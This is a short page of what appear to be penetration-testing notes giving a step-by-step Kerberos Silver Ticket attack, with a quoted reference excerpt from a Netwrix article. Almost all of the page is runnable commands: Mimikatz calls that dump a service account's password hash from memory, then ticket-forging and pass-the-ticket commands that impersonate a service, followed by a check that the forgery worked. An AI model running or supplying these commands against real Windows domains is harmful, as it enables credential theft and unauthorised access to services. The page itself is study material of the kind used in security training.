Previous

Silver Ticket Attack

  1. whoami /user

    to get SID like S-1-5-21-1602875587-2787523311-2599479668-1103

    The SID defining the domain is the entire string except the RID at the end ( -1103 )
  1. Extract hash of the service
    1. Mimikatz.exe
    1. privilege::debug
    1. sekurlsa::logonpasswords
  1. kerberos::purge to delete existing ticket
  1. kerberos::list to verify
  1. kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<fully qualified host name of the service> /service:<service_name>/rc4:<password hash of that service> /ptt
  1. misc::cmd to launch cmd to verify the success

Reference:

Silver Ticket Attack
To gain the ability to mint TGS tickets, an adversary must first compromise the password hash of a service account. In this example, an adversary who has compromised a file server now compromises the password hash of a service account: PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords # ...
https://www.netwrix.com/silver_ticket_attack_forged_service_tickets.html